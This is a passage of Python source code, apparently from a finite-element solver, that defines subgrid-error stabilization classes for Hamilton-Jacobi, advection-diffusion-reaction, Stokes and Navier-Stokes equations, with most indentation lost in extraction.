q[('dmt',ci,cj)],
self.dftemp,
q[('a',ci,ck)],
q[('da',ci,ck,cj)],
q[('grad(phi)',ck)],
q[('dphi',ck,cj)],
self.drtmp[(ci,cj)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
for ci in [0,1]:
if self.lag:
tau=self.tau_last[ci]
else:
tau=self.tau[ci]
#for now just compute wrt to cj?
# cj = 0
# csubgridError.calculateSubgridError_tauRes(tau,
# q[('pdeResidual',ci)],
# q[('dpdeResidual',ci,cj)],
# q[('subgridError',ci)],
# q[('dsubgridError',ci,cj)])
csubgridError.calculateSubgridError_tauRes(tau,
q[('pdeResidual',0)],
q[('dpdeResidual',0,0)],
q[('subgridError',ci)],
q[('dsubgridError',ci,0)])
# print "tau",tau
# print "pdeResidual",q[('pdeResidual',ci)]
# print "dpdeResidual",q[('dpdeResidual',ci,ci)]
# print "subgrid error",q[('subgridError',ci)]
# print "dsubgrid error",q[('dsubgridError',ci,ci)]
class HamiltonJacobi_ASGS(SGE_base):
def __init__(self,coefficients,nd,stabFlag='1',lag=False):
SGE_base.__init__(self,coefficients,nd,lag)
self.stabilizationFlag = stabFlag
def initializeElementQuadrature(self,mesh,t,cq):
import copy
self.cq=cq
self.mesh=mesh
self.tau={}
for ci in range(self.nc):
self.tau[ci]=numpy.zeros(cq[('u',ci)].shape,'d')
if self.lag:
cq[('dH_sge',ci,ci)]=copy.deepcopy(cq[('dH',ci,ci)])
else:
cq[('dH_sge',ci,ci)]=cq[('dH',ci,ci)]
def calculateSubgridError(self,q):
for ci in range(self.nc):
csubgridError.calculateSubgridError_HJ_tau(self.stabilizationFlag,
self.mesh.elementDiametersArray,
q[('dmt',ci,ci)],
q[('dH_sge',ci,ci)],
q[('cfl',ci)],
self.tau[ci])
csubgridError.calculateSubgridError_tauRes(self.tau[ci],
q[('pdeResidual',ci)],
q[('dpdeResidual',ci,ci)],
q[('subgridError',ci)],
q[('dsubgridError',ci,ci)])
def updateSubgridErrorHistory(self,initializationPhase=False):
if self.lag:
for ci in range(self.nc):
self.cq[('dH_sge',ci,ci)][:]= self.cq[('dH',ci,ci)]
class HamiltonJacobiDiffusionReaction_ASGS(SGE_base):
def __init__(self,coefficients,nd,stabFlag='1',lag=False):
SGE_base.__init__(self,coefficients,nd,lag)
self.stabilizationFlag = stabFlag
def initializeElementQuadrature(self,mesh,t,cq):
import copy
self.mesh=mesh
self.tau=[]
self.tau_last=[]
self.cq=cq
for ci in range(self.nc):
if self.lag:
self.tau_last.append(numpy.zeros(cq[('u',ci)].shape,'d'))
self.tau.append(numpy.zeros(cq[('u',ci)].shape,'d'))
if cq.has_key(('dH',ci,ci)):
cq[('dH_sge',ci,ci)] = copy.deepcopy(cq[('dH',ci,ci)])
if cq.has_key(('dm',ci,ci)):
cq[('dm_sge',ci,ci)] = copy.deepcopy(cq[('dm',ci,ci)])
if cq.has_key(('dmt',ci,ci)):
cq[('dmt_sge',ci,ci)] = copy.deepcopy(cq[('dmt',ci,ci)])
else:
if cq.has_key(('dH',ci,ci)):
cq[('dH_sge',ci,ci)] = cq[('dH',ci,ci)]
if cq.has_key(('dm',ci,ci)):
cq[('dm_sge',ci,ci)] = cq[('dm',ci,ci)]
if cq.has_key(('dmt',ci,ci)):
cq[('dmt_sge',ci,ci)] = cq[('dmt',ci,ci)]
self.tau.append(numpy.zeros(cq[('u',ci)].shape,'d'))
for ci,ckDict in self.coefficients.diffusion.iteritems():
if self.lag:#mwf looks like this was missing if lag May 7 09
for ck,cjDict in ckDict.iteritems():
cq[('grad(phi)_sge',ck)]=copy.deepcopy(cq[('grad(phi)',ck)])
for cj in cjDict.keys():
cq[('dphi_sge',ck,cj)]=copy.deepcopy(cq[('dphi',ck,cj)])
cq[('da_sge',ci,ck,cj)]=copy.deepcopy(cq[('da',ci,ck,cj)])
else:
for ck,cjDict in ckDict.iteritems():
cq[('grad(phi)_sge',ck)]=cq[('grad(phi)',ck)]
for cj in cjDict.keys():
cq[('dphi_sge',ck,cj)]=cq[('dphi',ck,cj)]
cq[('da_sge',ci,ck,cj)]=cq[('da',ci,ck,cj)]
def updateSubgridErrorHistory(self,initializationPhase=False):
if self.lag:
for ci in range(self.nc):
self.tau_last[ci][:] = self.tau[ci]
#mwf should these be deep copies?
self.cq[('dH_sge',ci,ci)][:] = self.cq[('dH',ci,ci)]
self.cq[('dm_sge',ci,ci)][:] = self.cq[('dm',ci,ci)]
for ci,ckDict in self.coefficients.diffusion.iteritems():
for ck,cjDict in ckDict.iteritems():
self.cq[('grad(phi)_sge',ck)][:]=self.cq[('grad(phi)',ck)]
for cj in cjDict.keys():
self.cq[('dphi_sge',ck,cj)][:]=0.0 #grad(phi) will be a constant when lagged so dphi=0 not 1
self.cq[('da_sge',ci,ck,cj)][:]=self.cq[('da',ci,ck,cj)]
def calculateSubgridError(self,q):
        oldTau = False  # True -- mwf: oldTau not working with sd!
for ci in range(self.nc):
if oldTau:
if self.coefficients.sd:
csubgridError.calculateSubgridError_ADR_tau_sd(self.stabilizationFlag,
self.coefficients.sdInfo[(ci,ci)][0],self.coefficients.sdInfo[(ci,ci)][1],
self.mesh.elementDiametersArray,
q[('dmt',ci,ci)],
q[('dH',ci,ci)],
q[('a',ci,ci)],
q[('da',ci,ci,ci)],
q[('grad(phi)',ci)],
q[('dphi',ci,ci)],
q[('dr',ci,ci)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
else:
csubgridError.calculateSubgridError_ADR_tau(self.stabilizationFlag,
self.mesh.elementDiametersArray,
q[('dmt',ci,ci)],
q[('dH',ci,ci)],
q[('a',ci,ci)],
q[('da',ci,ci,ci)],
q[('grad(phi)',ci)],
q[('dphi',ci,ci)],
q[('dr',ci,ci)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
else:
if self.coefficients.sd:
csubgridError.calculateSubgridError_ADR_generic_tau_sd(self.coefficients.sdInfo[(ci,ci)][0],self.coefficients.sdInfo[(ci,ci)][1],
q['inverse(J)'],
q[('dmt',ci,ci)],
q[('dH',ci,ci)],
q[('a',ci,ci)],
q[('da',ci,ci,ci)],
q[('grad(phi)',ci)],
q[('dphi',ci,ci)],
q[('dr',ci,ci)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
else:
csubgridError.calculateSubgridError_ADR_generic_tau(q['inverse(J)'],
q[('dmt',ci,ci)],
q[('dH',ci,ci)],
q[('a',ci,ci)],
q[('da',ci,ci,ci)],
q[('grad(phi)',ci)],
q[('dphi',ci,ci)],
q[('dr',ci,ci)],
q[('pe',ci)],
q[('cfl',ci)],
self.tau[ci])
if self.lag:
tau=self.tau_last[ci]
else:
tau=self.tau[ci]
for cj in range(self.nc):
if q.has_key(('dpdeResidual',ci,cj)):
csubgridError.calculateSubgridError_tauRes(tau,
q[('pdeResidual',ci)],
q[('dpdeResidual',ci,cj)],
q[('subgridError',ci)],
q[('dsubgridError',ci,cj)])
class HamiltonJacobi_ASGS_opt(SGE_base):
def __init__(self,coefficients,nd,stabFlag='1',lag=False):
SGE_base.__init__(self,coefficients,nd,lag)
self.stabilizationFlag = stabFlag
def initializeElementQuadrature(self,mesh,t,cq):
import copy
self.cq=cq
self.mesh=mesh
self.tau=[]
self.tau_last=[]
for ci in range(self.nc):
if self.lag:
cq[('dH_sge',ci,ci)]=copy.deepcopy(cq[('dH',ci,ci)])
else:
cq[('dH_sge',ci,ci)]=cq[('dH',ci,ci)]
def calculateSubgridError(self,q):
pass
def updateSubgridErrorHistory(self,initializationPhase=False):
if self.lag:
for ci in range(self.nc):
self.cq[('dH_sge',ci,ci)][:]= self.cq[('dH',ci,ci)]
class StokesStabilization_1(SGE_base):
def __init__(self,coefficients,nd,stabFlag='1',lag=False):
SGE_base.__init__(self,coefficients,nd,lag)
def calculateSubgridError(self,q):
if self.coefficients.sd:
csubgridError.calculateSubgridErrorStokes2D_1_sd(self.mesh.elementDiametersArray,
q[('u',1)],
q[('u',2)],
q[('a',1,1)],
q[('pdeResidual',0)],
q[('dpdeResidual',0,1)],
q[('dpdeResidual',0,2)],
q[('pdeResidual',1)],
q[('dpdeResidual',1,0)],
q[('dpdeResidual',1,1)],
q[('pdeResidual',2)],
q[('dpdeResidual',2,0)],
q[('dpdeResidual',2,2)],
q[('subgridError',0)],
q[('dsubgridError',0,0)],
q[('dsubgridError',0,1)],
q[('dsubgridError',0,2)],
q[('subgridError',1)],
q[('dsubgridError',1,0)],
q[('dsubgridError',1,1)],
q[('dsubgridError',1,2)],
q[('subgridError',2)],
q[('dsubgridError',2,0)],
q[('dsubgridError',2,1)],
q[('dsubgridError',2,2)])
else:
csubgridError.calculateSubgridErrorStokes2D_1(self.mesh.elementDiametersArray,
q[('u',1)],
q[('u',2)],
q[('a',1,1)],
q[('pdeResidual',0)],
q[('dpdeResidual',0,1)],
q[('dpdeResidual',0,2)],
q[('pdeResidual',1)],
q[('dpdeResidual',1,0)],
q[('dpdeResidual',1,1)],
q[('pdeResidual',2)],
q[('dpdeResidual',2,0)],
q[('dpdeResidual',2,2)],
q[('subgridError',0)],
q[('dsubgridError',0,0)],
q[('dsubgridError',0,1)],
q[('dsubgridError',0,2)],
q[('subgridError',1)],
q[('dsubgridError',1,0)],
q[('dsubgridError',1,1)],
q[('dsubgridError',1,2)],
q[('subgridError',2)],
q[('dsubgridError',2,0)],
q[('dsubgridError',2,1)],
q[('dsubgridError',2,2)])
def updateSubgridErrorHistory(self,initializationPhase=False):
pass
class StokesASGS_velocity(SGE_base):
def __init__(self,coefficients,nd):
SGE_base.__init__(self,coefficients,nd,lag=False)
self.stabilizationFlag = '1'
coefficients.stencil[0].add(0)
if nd == 2:
coefficients.stencil[1].add(2)
coefficients.stencil[2].add(1)
elif nd == 3:
coefficients.stencil[1].add(2)
coefficients.stencil[1].add(3)
coefficients.stencil[2].add(1)
coefficients.stencil[2].add(3)
coefficients.stencil[3].add(1)
coefficients.stencil[3].add(2)
def calculateSubgridError(self,q):
if self.nd == 2:
if self.coefficients.sd:
csubgridError.calculateSubgridErrorStokes2D_GLS_velocity_sd(self.mesh.elementDiametersArray,
q[('a',1,1)],
q[('pdeResidual',1)],
q[('dpdeResidual',1,0)],
q[('dpdeResidual',1,1)],
q[('pdeResidual',2)],
q[('dpdeResidual',2,0)],
q[('dpdeResidual',2,2)],
q[('subgridError',1)],
q[('dsubgridError',1,0)],
q[('dsubgridError',1,1)],
q[('subgridError',2)],
q[('dsubgridError',2,0)],
q[('dsubgridError',2,2)])
else:
csubgridError.calculateSubgridErrorStokes2D_GLS_velocity(self.mesh.elementDiametersArray,
q[('a',1,1)],
q[('pdeResidual',1)],
q[('dpdeResidual',1,0)],
q[('dpdeResidual',1,1)],
q[('pdeResidual',2)],
q[('dpdeResidual',2,0)],
q[('dpdeResidual',2,2)],
q[('subgridError',1)],
q[('dsubgridError',1,0)],
q[('dsubgridError',1,1)],
q[('subgridError',2)],
q[('dsubgridError',2,0)],
q[('dsubgridError',2,2)])
elif self.nd == 3:
if self.coefficients.sd:
csubgridError.calculateSubgridErrorStokes3D_GLS_velocity_sd(self.mesh.elementDiametersArray,
q[('a',1,1)],
q[('pdeResidual',1)],
q[('dpdeResidual',1,0)],
q[('dpdeResidual',1,1)],
q[('pdeResidual',2)],
q[('dpdeResidual',2,0)],
q[('dpdeResidual',2,2)],
q[('pdeResidual',3)],
q[('dpdeResidual',3,0)],
q[('dpdeResidual',3,3)],
q[('subgridError',1)],
q[('dsubgridError',1,0)],
q[('dsubgridError',1,1)],
q[('subgridError',2)],
q[('dsubgridError',2,0)],
q[('dsubgridError',2,2)],
q[('subgridError',3)],
q[('dsubgridError',3,0)],
q[('dsubgridError',3,3)])
else:
csubgridError.calculateSubgridErrorStokes3D_GLS_velocity(self.mesh.elementDiametersArray,
q[('a',1,1)],
q[('pdeResidual',1)],
q[('dpdeResidual',1,0)],
q[('dpdeResidual',1,1)],
q[('pdeResidual',2)],
q[('dpdeResidual',2,0)],
q[('dpdeResidual',2,2)],
q[('pdeResidual',3)],
q[('dpdeResidual',3,0)],
q[('dpdeResidual',3,3)],
q[('subgridError',1)],
q[('dsubgridError',1,0)],
q[('dsubgridError',1,1)],
q[('subgridError',2)],
q[('dsubgridError',2,0)],
q[('dsubgridError',2,2)],
q[('subgridError',3)],
q[('dsubgridError',3,0)],
q[('dsubgridError',3,3)])
#mwf debug
#import pdb
#pdb.set_trace()
def updateSubgridErrorHistory(self,initializationPhase=False):
pass
class NavierStokesASGS_velocity_pressure(SGE_base):
def __init__(self,coefficients,nd,stabFlag='1',lag=False,delayLagSteps=5,hFactor=1.0,noPressureStabilization=False):
self.noPressureStabilization=noPressureStabilization
SGE_base.__init__(self,coefficients,nd,lag)
self.stabilizationFlag = stabFlag
coefficients.stencil[0].add(0)
self.nSteps=0
self.delayLagSteps=delayLagSteps
self.hFactor=hFactor
def initializeElementQuadrature(self,mesh,t,cq):
import copy
self.mesh=mesh
self.tau=[]
self.tau_last=[]
self.df_last={}
self.cq=cq
self.v_last = copy.deepcopy(cq[('f',0)])
for ci in range(self.nc):
if self.lag:
self.tau_last.append(numpy.zeros(cq[('u',ci)].shape,'d'))
self.tau.append(numpy.zeros(cq[('u',ci)].shape,'d'))
for cj in range(self.nc):
if cq.has_key(('df',ci,cj)):
if ci ==0:
cq[('df_sge',ci,cj)]=cq[('df',ci,cj)]
else:
#cek for incompressible form weshould just be able to use v_last
#cq[('df_sge',ci,cj)] = numpy.zeros(cq[('df',ci,cj)].shape,'d')
if ci == cj:
cq[('df_sge',ci,cj)] = self.v_last
else:
cq[('df_sge',ci,cj)] = numpy.zeros(cq[('df',ci,cj)].shape,'d')
else:
for cj in range(self.nc):
if cq.has_key(('df',ci,cj)):
cq[('df_sge',ci,cj)]=cq[('df',ci,cj)]
self.tau.append(numpy.zeros(cq[('u',ci)].shape,'d'))
for ci,ckDict in self.coefficients.diffusion.iteritems():
for ck,cjDict in ckDict.iteritems():
cq[('grad(phi)_sge',ck)]=cq[('grad(phi)',ck)]
for cj in cjDict.keys():
cq[('dphi_sge',ck,cj)]=cq[('dphi',ck,cj)]
cq[('da_sge',ci,ck,cj)]=cq[('da',ci,ck,cj)]
for ci,cjDict in self.coefficients.hamiltonian.iteritems():
for cj in cjDict:
cq[('dH_sge',ci,cj)]=cq[('dH',ci,cj)]
if self.lag:
if self.coefficients.sd:
csubgridError.calculateSubgridErrorNavierStokes2D_GLS_tau_sd(self.hFactor,
self.mesh.elementDiametersArray,
cq[('dmt',1,1)],
cq[('dm',1,1)],
cq[('f',0)],
cq[('a',1,1)],
self.tau[0],
self.tau[1],
cq[('cfl',0)])
else:
csubgridError.calculateSubgridErrorNavierStokes2D_GLS_tau(self.hFactor,
self.mesh.elementDiametersArray,
cq[('dmt',1,1)],
cq[('dm',1,1)],
cq[('f',0)],
cq[('a',1,1)],
self.tau[0],
self.tau[1],
cq[('cfl',0)])
self.v_last[:]=self.cq[('f',0)]
def updateSubgridErrorHistory(self,initializationPhase=False):
self.nSteps+=1
if self.lag:
for ci in range(self.nc):
self.tau_last[ci][:] = self.tau[ci]
self.v_last[:]=self.cq[('f',0)]
#cek for incompressible form we can just use v_last
# for cj in range(self.nc):
# if self.cq.has_key(('df',ci,cj)):
# if ci != 0:
# self.cq[('df_sge',ci,cj)][:] = self.cq[('df',ci,cj)]
def calculateSubgridError(self,q):
import LinearAlgebraTools
oldTau=True
if self.nd == 2:
if self.lag and self.nSteps < self.delayLagSteps:
v = q[('f',0)]
elif self.lag:
v = self.v_last
else:
v = q[('f',0)]
if oldTau:
if self.coefficients.sd:
csubgridError.calculateSubgridErrorNavierStokes2D_GLS_tau_sd(self.hFactor,
self.mesh.elementDiametersArray,
q[('dmt',1,1)],
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
else:
csubgridError.calculateSubgridErrorNavierStokes2D_GLS_tau(self.hFactor,
self.mesh.elementDiametersArray,
q[('dmt',1,1)],
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
else:
if self.coefficients.sd:
csubgridError.calculateSubgridErrorNavierStokes2D_generic_tau_sd(q['inverse(J)'],
q[('dmt',1,1)],
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
else:
csubgridError.calculateSubgridErrorNavierStokes2D_generic_tau(q['inverse(J)'],
q[('dmt',1,1)],
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
tau0=self.tau[0]
tau1=self.tau[1]
csubgridError.calculateSubgridErrorNavierStokes2D_GLS_tauRes(tau0,
tau1,
q[('pdeResidual',0)],
q[('dpdeResidual',0,1)],
q[('dpdeResidual',0,2)],
q[('pdeResidual',1)],
q[('dpdeResidual',1,0)],
q[('dpdeResidual',1,1)],
q[('dpdeResidual',1,2)],
q[('pdeResidual',2)],
q[('dpdeResidual',2,0)],
q[('dpdeResidual',2,1)],
q[('dpdeResidual',2,2)],
q[('subgridError',0)],
q[('dsubgridError',0,1)],
q[('dsubgridError',0,2)],
q[('subgridError',1)],
q[('dsubgridError',1,0)],
q[('dsubgridError',1,1)],
q[('dsubgridError',1,2)],
q[('subgridError',2)],
q[('dsubgridError',2,0)],
q[('dsubgridError',2,1)],
q[('dsubgridError',2,2)])
if self.noPressureStabilization:
q[('subgridError',0)][:]=0.0
q[('dsubgridError',0,1)][:]=0.0
q[('dsubgridError',0,2)][:]=0.0
elif self.nd == 3:
if self.lag and self.nSteps < self.delayLagSteps:
v = q[('f',0)]
elif self.lag:
v = self.v_last
else:
v = q[('f',0)]
if oldTau:
if self.coefficients.sd:
csubgridError.calculateSubgridErrorNavierStokes2D_GLS_tau_sd(self.hFactor,
self.mesh.elementDiametersArray,
q[('dmt',1,1)],
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
else:
csubgridError.calculateSubgridErrorNavierStokes2D_GLS_tau(self.hFactor,
self.mesh.elementDiametersArray,
q[('dmt',1,1)],
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
else:
if self.coefficients.sd:
csubgridError.calculateSubgridErrorNavierStokes2D_generic_tau_sd(q['inverse(J)'],
q[('dmt',1,1)],
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
else:
csubgridError.calculateSubgridErrorNavierStokes2D_generic_tau(q['inverse(J)'],
q[('dmt',1,1)],
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
tau0=self.tau[0]
tau1=self.tau[1]
csubgridError.calculateSubgridErrorNavierStokes3D_GLS_tauRes(tau0,
tau1,
q[('pdeResidual',0)],
q[('dpdeResidual',0,1)],
q[('dpdeResidual',0,2)],
q[('dpdeResidual',0,3)],
q[('pdeResidual',1)],
q[('dpdeResidual',1,0)],
q[('dpdeResidual',1,1)],
q[('dpdeResidual',1,2)],
q[('dpdeResidual',1,3)],
q[('pdeResidual',2)],
q[('dpdeResidual',2,0)],
q[('dpdeResidual',2,1)],
q[('dpdeResidual',2,2)],
q[('dpdeResidual',2,3)],
q[('pdeResidual',3)],
q[('dpdeResidual',3,0)],
q[('dpdeResidual',3,1)],
q[('dpdeResidual',3,2)],
q[('dpdeResidual',3,3)],
q[('subgridError',0)],
q[('dsubgridError',0,1)],
q[('dsubgridError',0,2)],
q[('dsubgridError',0,3)],
q[('subgridError',1)],
q[('dsubgridError',1,0)],
q[('dsubgridError',1,1)],
q[('dsubgridError',1,2)],
q[('dsubgridError',1,3)],
q[('subgridError',2)],
q[('dsubgridError',2,0)],
q[('dsubgridError',2,1)],
q[('dsubgridError',2,2)],
q[('dsubgridError',2,3)],
q[('subgridError',3)],
q[('dsubgridError',3,0)],
q[('dsubgridError',3,1)],
q[('dsubgridError',3,2)],
q[('dsubgridError',3,3)])
if self.noPressureStabilization:
q[('subgridError',0)][:]=0.0
q[('dsubgridError',0,1)][:]=0.0
q[('dsubgridError',0,2)][:]=0.0
q[('dsubgridError',0,3)][:]=0.0
for ci in range(self.nd):
q[('cfl',ci+1)][:] = q[('cfl',0)]
class NavierStokesASGS_velocity_pressure_opt(SGE_base):
def __init__(self,coefficients,nd,stabFlag='1',lag=False,delayLagSteps=5,hFactor=1.0,noPressureStabilization=False):
self.noPressureStabilization=noPressureStabilization
SGE_base.__init__(self,coefficients,nd,lag)
self.stabilizationFlag = stabFlag
coefficients.stencil[0].add(0)
self.nSteps=0
self.delayLagSteps=delayLagSteps
self.hFactor=hFactor
def initializeElementQuadrature(self,mesh,t,cq):
import copy
self.mesh=mesh
self.tau=[]
self.tau_last=[]
self.df_last={}
self.cq=cq
if self.lag:
self.v_last = self.cq[('velocity',0)]
else:
self.v_last = cq[('f',0)]
cq[('df_sge',1,1)]=self.v_last
cq[('df_sge',2,2)]=self.v_last
cq[('df_sge',3,3)]=self.v_last
def updateSubgridErrorHistory(self,initializationPhase=False):
self.nSteps+=1
def calculateSubgridError(self,q):
        if self.nSteps < self.delayLagSteps:
            self.v_last = q[('f',0)]
            self.cq[('df_sge',1,1)] = q[('f',0)]
            self.cq[('df_sge',2,2)] = q[('f',0)]
            self.cq[('df_sge',3,3)] = q[('f',0)]
        else:
            self.v_last = q[('velocity',0)]
            self.cq[('df_sge',1,1)] = q[('velocity',0)]
            self.cq[('df_sge',2,2)] = q[('velocity',0)]
            self.cq[('df_sge',3,3)] = q[('velocity',0)]
class NavierStokesASGS_velocity_pressure_optV2(SGE_base):
def __init__(self,coefficients,nd,stabFlag='1',lag=False,delayLagSteps=0,hFactor=1.0,noPressureStabilization=False):
self.noPressureStabilization=noPressureStabilization
SGE_base.__init__(self,coefficients,nd,lag)
self.stabilizationFlag = stabFlag
coefficients.stencil[0].add(0)
self.nSteps=0
self.delayLagSteps=delayLagSteps
self.hFactor=hFactor
def initializeElementQuadrature(self,mesh,t,cq):
import copy
self.mesh=mesh
self.tau=[]
self.tau_last=[]
self.df_last={}
self.cq=cq
if self.lag:
self.v_last = copy.deepcopy(self.cq[('velocity',0)])
else:
self.v_last = self.cq[('velocity',0)]
def updateSubgridErrorHistory(self,initializationPhase=False):
if self.lag:
self.v_last[:] = self.cq[('velocity',0)]
def calculateSubgridError(self,q):
pass
class NavierStokesWithBodyForceASGS_velocity_pressure(NavierStokesASGS_velocity_pressure):
def __init__(self,coefficients,nd,stabFlag='1',lag=False,delayLagSteps=5,hFactor=1.0,noPressureStabilization=False):
NavierStokesASGS_velocity_pressure.__init__(self,coefficients,nd,stabFlag=stabFlag,lag=lag,
delayLagSteps=delayLagSteps,hFactor=hFactor,noPressureStabilization=noPressureStabilization)
def initializeElementQuadrature(self,mesh,t,cq):
NavierStokesASGS_velocity_pressure.initializeElementQuadrature(self,mesh,t,cq)
self.q_dmt_r = numpy.zeros(cq[('dmt',1,1)].shape,'d')
def calculateSubgridError(self,q):
import LinearAlgebraTools
oldTau=True
self.q_dmt_r.flat[:] = q[('dmt',1,1)].flat
self.q_dmt_r += q[('dr',1,1)]
if self.nd == 2:
if self.lag and self.nSteps < self.delayLagSteps:
v = q[('f',0)]
elif self.lag:
v = self.v_last
else:
v = q[('f',0)]
if oldTau:
if self.coefficients.sd:
csubgridError.calculateSubgridErrorNavierStokes2D_GLS_tau_sd(self.hFactor,
self.mesh.elementDiametersArray,
self.q_dmt_r,
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
else:
csubgridError.calculateSubgridErrorNavierStokes2D_GLS_tau(self.hFactor,
self.mesh.elementDiametersArray,
self.q_dmt_r,
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
else:
if self.coefficients.sd:
csubgridError.calculateSubgridErrorNavierStokes2D_generic_tau_sd(q['inverse(J)'],
self.q_dmt_r,
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
else:
csubgridError.calculateSubgridErrorNavierStokes2D_generic_tau(q['inverse(J)'],
self.q_dmt_r,
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
tau0=self.tau[0]
tau1=self.tau[1]
csubgridError.calculateSubgridErrorNavierStokes2D_GLS_tauRes(tau0,
tau1,
q[('pdeResidual',0)],
q[('dpdeResidual',0,1)],
q[('dpdeResidual',0,2)],
q[('pdeResidual',1)],
q[('dpdeResidual',1,0)],
q[('dpdeResidual',1,1)],
q[('dpdeResidual',1,2)],
q[('pdeResidual',2)],
q[('dpdeResidual',2,0)],
q[('dpdeResidual',2,1)],
q[('dpdeResidual',2,2)],
q[('subgridError',0)],
q[('dsubgridError',0,1)],
q[('dsubgridError',0,2)],
q[('subgridError',1)],
q[('dsubgridError',1,0)],
q[('dsubgridError',1,1)],
q[('dsubgridError',1,2)],
q[('subgridError',2)],
q[('dsubgridError',2,0)],
q[('dsubgridError',2,1)],
q[('dsubgridError',2,2)])
if self.noPressureStabilization:
q[('subgridError',0)][:]=0.0
q[('dsubgridError',0,1)][:]=0.0
q[('dsubgridError',0,2)][:]=0.0
elif self.nd == 3:
if self.lag and self.nSteps < self.delayLagSteps:
v = q[('f',0)]
elif self.lag:
v = self.v_last
else:
v = q[('f',0)]
if oldTau:
if self.coefficients.sd:
csubgridError.calculateSubgridErrorNavierStokes2D_GLS_tau_sd(self.hFactor,
self.mesh.elementDiametersArray,
self.q_dmt_r,
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
else:
csubgridError.calculateSubgridErrorNavierStokes2D_GLS_tau(self.hFactor,
self.mesh.elementDiametersArray,
self.q_dmt_r,
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
else:
if self.coefficients.sd:
csubgridError.calculateSubgridErrorNavierStokes2D_generic_tau_sd(q['inverse(J)'],
self.q_dmt_r,
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
else:
csubgridError.calculateSubgridErrorNavierStokes2D_generic_tau(q['inverse(J)'],
self.q_dmt_r,
q[('dm',1,1)],
v,
q[('a',1,1)],
self.tau[0],
self.tau[1],
q[('cfl',0)])
tau0=self.tau[0]
tau1=self.tau[1]
csubgridError.calculateSubgridErrorNavierStokes3D_GLS_tauRes(tau0,
tau1,
q[('pdeResidual',0)],
q[('dpdeResidual',0,1)],
q[('dpdeResidual',0,2)],
q[('dpdeResidual',0,3)],
q[('pdeResidual',1)],
q[('dpdeResidual',1,0)],
q[('dpdeResidual',1,1)],
q[('dpdeResidual',1,2)],
q[('dpdeResidual',1,3)],
q[('pdeResidual',2)],
q[('dpdeResidual',2,0)],
q[('dpdeResidual',2,1)],
q[('dpdeResidual',2,2)],
q[('dpdeResidual',2,3)],
q[('pdeResidual',3)],
q[('dpdeResidual',3,0)],
q[('dpdeResidual',3,1)],
q[('dpdeResidual',3,2)],
q[('dpdeResidual',3,3)],
q[('subgridError',0)],
q[('dsubgridError',0,1)],
q[('dsubgridError',0,2)],
q[('dsubgridError',0,3)],
q[('subgridError',1)],
q[('dsubgridError',1,0)],
q[('dsubgridError',1,1)],
q[('dsubgridError',1,2)],
q[('dsubgridError',1,3)],
q[('subgridError',2)],
q[('dsubgridError',2,0)],
q[('dsubgridError',2,1)],
q[('dsubgridError',2,2)],
q[('dsubgridError',2,3)],
q[('subgridError',3)],
q[('dsubgridError',3,0)],
q[('dsubgridError',3,1)],
q[('dsubgridError',3,2)],
q[('dsubgridError',3,3)])
if self.noPressureStabilization:
q[('subgridError',0)][:]=0.0
q[('dsubgridError',0,1)][:]=0.0
q[('dsubgridError',0,2)][:]=0.0
q[('dsubgridError',0,3)][:]=0.0
for ci in range(self.nd):
q[('cfl',ci+1)][:] = q[('cfl',0)]
#mwf orig
# if self.nd == 2:
# if self.coefficients.sd:
# csubgridError.calculateSubgridErrorNavierStokes2D_generic_withBodyForce_tau_sd(q['inverse(J)'],
# q[('dmt',1,1)],
# q[('dm',1,1)],
# q[('df',1,1)],
# q[('a',1,1)],
# q[('dr',1,1)],
# self.tau[0],
# self.tau[1],
# q[('cfl',0)])
# else:
# csubgridError.calculateSubgridErrorNavierStokes2D_generic_withBodyForce_tau(q['inverse(J)'],
# q[('dmt',1,1)],
# q[('dm',1,1)],
# q[('df',1,1)],
# q[('a',1,1)],
# q[('dr',1,1)],
# self.tau[0],
# self.tau[1],
# q[('cfl',0)])
# if self.lag:#TODO: make sure up to date with delaySteps flag
# tau0=self.tau_last[0]
# tau1=self.tau_last[1]
# else:
# tau0=self.tau[0]
# tau1=self.tau[1]
# csubgridError.calculateSubgridErrorNavierStokes2D_GLS_tauRes(tau0,
# tau1,
# q[('pdeResidual',0)],
# q[('dpdeResidual',0,1)],
# q[('dpdeResidual',0,2)],
# q[('pdeResidual',1)],
# q[('dpdeResidual',1,0)],
# q[('dpdeResidual',1,1)],
# q[('pdeResidual',2)],
# q[('dpdeResidual',2,0)],
# q[('dpdeResidual',2,2)],
# q[('subgridError',0)],
# q[('dsubgridError',0,1)],
# q[('dsubgridError',0,2)],
# q[('subgridError',1)],
# q[('dsubgridError',1,0)],
# q[('dsubgridError',1,1)],
# q[('subgridError',2)],
# q[('dsubgridError',2,0)],
# q[('dsubgridError',2,2)])
# elif self.nd == 3:
# return NavierStokesASGS_velocity_pressure.calculateSubgridError(q)
class StokesASGS_velocity_pressure(SGE_base):
def __init__(self,coefficients,nd):
SGE_base.__init__(self,coefficients,nd,lag=False)
coefficients.stencil[0].add(0)
